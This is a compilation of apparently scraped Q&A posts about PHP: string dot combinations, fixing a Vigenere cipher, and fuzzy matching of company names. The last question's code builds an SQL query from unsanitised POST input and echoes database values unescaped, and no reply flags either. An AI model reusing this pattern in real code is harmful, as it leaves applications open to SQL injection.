This is quite an unusual question, but I can't help but try to wrap around what you are tying to do. My guess is that you want to see how many combinations of a string there are with a dot moving between characters, finally coming to rest right before the last character.
My understanding is you want a count and a printout of string similar to what you see here:
t.est
te.st
tes.t
t.es.t
te.s.t
t.e.s.t
count: 6
To facilitate this functionality I came up with a class, this way you could port it to other parts of code and it can handle multiple strings. The caveat here is the strings must be at least two characters and not contain a period. Here is the code for the class:
class DotCombos
{
public $combos;
private function combos($string)
{
$rebuilt = "";
$characters = str_split($string);
foreach($characters as $index => $char) {
if($index == 0 || $index == count($characters)) {
continue;
} else if(isset($characters[$index]) && $characters[$index] == ".") {
break;
} else {
$rebuilt = substr($string, 0, $index) . "." . substr($string, $index);
print("$rebuilt\n");
$this->combos++;
}
}
return $rebuilt;
}
public function allCombos($string)
{
if(strlen($string) < 2) {
return null;
}
$this->combos = 0;
for($i = 0; $i < count(str_split($string)) - 1; $i++) {
$string = $this->combos($string);
}
}
}
To make use of the class you would do this:
$combos = new DotCombos();
$combos->allCombos("test123");
print("Count: $combos->combos");
The output would be:
t.est123
te.st123
tes.t123
test.123
test1.23
test12.3
t.est12.3
te.st12.3
tes.t12.3
test.12.3
test1.2.3
t.est1.2.3
te.st1.2.3
tes.t1.2.3
test.1.2.3
t.est.1.2.3
te.st.1.2.3
tes.t.1.2.3
t.es.t.1.2.3
te.s.t.1.2.3
t.e.s.t.1.2.3
Count: 21
Hope that is what you are looking for (or at least helps)....

Vigenere in PHP

could anyone help me fix this Vigenere cypher in PHP?
Sorry for the ripped up code, that's from where I have been dissecting it for hours - trying to fix!
Anyhow, the code outputs 'Ace' when it should output 'Abc'.
There is some weird double offset which I don't have the maths brain to fix! Thanks for reading.
The code originates from here in AutoHotkey script - I have attempted to transcribe it. There are PHP Vigenere examples on the web (although not on Rosetta Code, weirdly!).. but anyhow, this one is modified to accept lower case as well as the standard capitals. Thanks.
$key = "AAA";
$keyLength = 3;
$keyIndex = 0;
$messageAsArray[0] = "A";
$messageAsArray[1] = "b";
$messageAsArray[2] = "c";
foreach ($messageAsArray as $value) //Loop through input string array
{
$thisValueASCII = ord($value);
if ($thisValueASCII >= 65 && $thisValueASCII <= 90) //if is uppercase
{
$thisValueASCIIOffset = 65;
}
else //if is lowercase
{
$thisValueASCIIOffset = 97;
}
$thisA = $thisValueASCII - $thisValueASCIIOffset;
$thisB = fmod($keyIndex,$keyLength);
$thisC = substr($key, $thisB, 1);
$thisD = ord($thisC) - 65;
$thisE = $thisA + $thisD;
$thisF = fmod($thisE,26);
$thisG = $thisF + $thisValueASCII ;
$thisOutput = chr($thisG);
$output = $output . $thisOutput ;
$keyIndex++;
}
echo $output
Ok, I read your code.
You're encoding, and your error is quite simple :
$thisG = $thisF + $thisValueASCII ;
In this step, $thisF is your encrypted letter, which value is between 0 and 25. You want to print it as an ascii char and, instead of adding the offset, you're adding the uncrypted ascii value, which makes no sense.
You should have :
$thisG = $thisF + $thisValueASCIIOffset;
A few tips.
You don't need to have your text or key as an array, you can use it as if it was one.
You can use the % operator instead of fmod. Makes the code easier to read, but it is just a personnal preference.
For instance :
$key = "AAA";
$keyLength = strlen($key);
$keyIndex = 0;
$message = str_split("Abc");
$output = '';
foreach($message as $value) // Loop through input string array
{
$thisValueASCII = ord($value);
if($thisValueASCII >= 65 && $thisValueASCII <= 90) // if is uppercase
{
$thisValueASCIIOffset = 65;
} else // if is lowercase
{
$thisValueASCIIOffset = 97;
}
$letter_value_corrected = $thisValueASCII - $thisValueASCIIOffset;
$key_index_corrected = $keyIndex % $keyLength; // This is the same as fmod but I prefer this notation.
$key_ascii_value = ord($key[$key_index_corrected]);
if($key_ascii_value >= 65 && $key_ascii_value <= 90) // if is uppercase
{
$key_offset = 65;
} else // if is lowercase
{
$key_offset = 97;
}
$final_key = $key_ascii_value - $key_offset;
$letter_value_encrypted = ($letter_value_corrected + $final_key)%26;
$output = $output . chr($letter_value_encrypted + $thisValueASCIIOffset);
$keyIndex++;
}
echo $output;
Have fun and good luck for your implementation !

How to reliably find similar strings to that typed in

I have an interface where a user will enter the name of a company. It then compares what they typed to current entries in the database, and if something similar is found it presents them with options (in case they misspelled) or they can click a button which confirms what they typed is definitely new and unique.
The problem I am having is that it is not very accurate and often brings up dozens of "similar" matches that aren't that similar at all!
Here is what I have now, the first large function I didn't make and I am not clear on what exactly it does. Is there are much simpler way to acheive what I want?
// Compares strings and determines how similar they are based on a nth letter split comparison.
function cmp_by_optionNumber($b, $a) {
if ($a["score"] == $b["score"]) return 0;
if ($a["score"] > $b["score"]) return 1;
return -1;
}
function string_compare($str_a, $str_b)
{
$length = strlen($str_a);
$length_b = strlen($str_b);
$i = 0;
$segmentcount = 0;
$segmentsinfo = array();
$segment = '';
while ($i < $length)
{
$char = substr($str_a, $i, 1);
if (strpos($str_b, $char) !== FALSE)
{
$segment = $segment.$char;
if (strpos($str_b, $segment) !== FALSE)
{
$segmentpos_a = $i - strlen($segment) + 1;
$segmentpos_b = strpos($str_b, $segment);
$positiondiff = abs($segmentpos_a - $segmentpos_b);
$posfactor = ($length - $positiondiff) / $length_b; // <-- ?
$lengthfactor = strlen($segment)/$length;
$segmentsinfo[$segmentcount] = array( 'segment' => $segment, 'score' => ($posfactor * $lengthfactor));
}
else
{
$segment = '';
$i--;
$segmentcount++;
}
}
else
{
$segment = '';
$segmentcount++;
}
$i++;
}
// PHP 5.3 lambda in array_map
$totalscore = array_sum(array_map(function($v) { return $v['score']; }, $segmentsinfo));
return $totalscore;
}
$q = $_POST['stringA'] ;
$qLengthMin = strlen($q) - 5 ; // Part of search calibration. Smaller number = stricter.
$qLengthMax = strlen($q) + 2 ; // not in use.
$main = array() ;
include("pdoconnect.php") ;
$result = $dbh->query("SELECT id, name FROM entity_details WHERE
name LIKE '{$q[0]}%'
AND CHAR_LENGTH(name) >= '$qLengthMin'
#LIMIT 50") ; // The first letter MUST be correct. This assumption makes checker faster and reduces irrelivant results.
$x = 0 ;
while($row = $result->fetch(PDO::FETCH_ASSOC)) {
$percent = string_compare(strtolower($q), strtolower(rawurldecode($row['name']))) ;
if($percent == 1) {
//echo 1 ;// 1 signifies an exact match on a company already in our DB.
echo $row['id'] ;
exit() ;
}
elseif($percent >= 0.6) { // Part of search calibration. Higher deci number = stricter.
$x++ ;
$main[$x]['name'] = rawurldecode($row['name']) ;
$main[$x]['score'] = round($percent, 2) * 100;
//array_push($overs, urldecode($row['name']) . " ($percent)<br />") ;
}
}
usort($main, "cmp_by_optionNumber") ;
$z = 0 ;
echo '<div style="overflow-y:scroll;height:175px;width:460px;">' ;
foreach($main as $c) {
if($c['score'] > 100) $c['score'] = 100 ;
if(count($main) > 1) {
echo '<div id="anysuggested' . $z . '" class="hoverdiv" onclick="selectAuto(' . "'score$z'" . ');">' ;
}
else echo '<div id="anysuggested' . $z . '" class="hoverdiv" style="color:#009444;" onclick="selectAuto(' . "'score$z'" . ');">' ;
echo '<span id="autoscore' . $z . '">' . $c['name'] . '</span></div>' ;
$z++ ;
}
echo '</div>' ;
Comparing strings is a huge topic and there are many ways to do it. One very common algorithm is called the Levenshtein difference. This is a native implementation in PHP but none in MySQL. There is however an implementation here that you could use.
You need aproximate/fuzzy string matching.
Read more about
http://php.net/manual/en/function.levenshtein.php, http://www.slideshare.net/kyleburton/fuzzy-string-matching
The best way would be to use some index based search engine like SOLR http://lucene.apache.org/solr/.

Categories